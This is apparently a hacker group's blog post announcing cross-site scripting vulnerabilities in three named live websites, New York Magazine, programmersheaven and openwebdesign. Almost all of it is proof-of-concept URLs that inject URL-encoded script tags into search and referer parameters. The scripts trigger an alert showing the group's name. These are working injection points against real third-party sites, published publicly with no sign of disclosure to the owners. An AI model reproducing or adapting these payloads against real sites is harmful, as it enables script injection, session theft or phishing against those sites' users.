Search This Blog

Powered by Blogger.

Blog Archive

Labels

The New York Magazin,programmersheaven Vulnerable to XSS :n0caReTeAm

Hacker Group "n0caReTeAm" discovered cross site scripting  vulnerability in  The New York Magazin, programmersheaven, openwebdesign websites.


Poc:
http://nymag.com/search/search.cgi?fd=All&Ns=Relevance|0&search_type=sw&N=0&textquery=%22%3E%3Cscript%3Ealert%28String.fromCharCode%28110%2C+48%2C+99%2C+97%2C+82%2C+101%2C+84%2C+101%2C+65%2C+109%2C+32%2C+88%2C+115%2C+115%29%29%3C%2Fscript%3E&x=18&y=16&scope=sc-all


http://www.openwebdesign.org/viewdesign.phtml?id=6216&referer=%2Fbrowse.php%22%3E%3Cscript%3Ealert%28String.fromCharCode%28110,%2048,%2099,%2097,%2082,%20101,%2084,%20101,%2065,%20109,%2032,%2088,%20115,%20115%29%29%3C/script%3E


http://www.programmersheaven.com/search/results/?cx=partner-pub-8629231900604628%3Ayi7bwia17xq&cof=FORID%3A10&ie=ISO-8859-1&as_q=%22%3E%3Cscript%3Ealert%28String.fromCharCode%28110%2C+48%2C+99%2C+97%2C+82%2C+101%2C+84%2C+101%2C+65%2C+109%2C+32%2C+88%2C+115%2C+115%29%29%3C%2Fscript%3E&sa=Search



Share it:

n0caReTeAm

Vulnerability

Web Application Vulnerability

XSS Vulnerability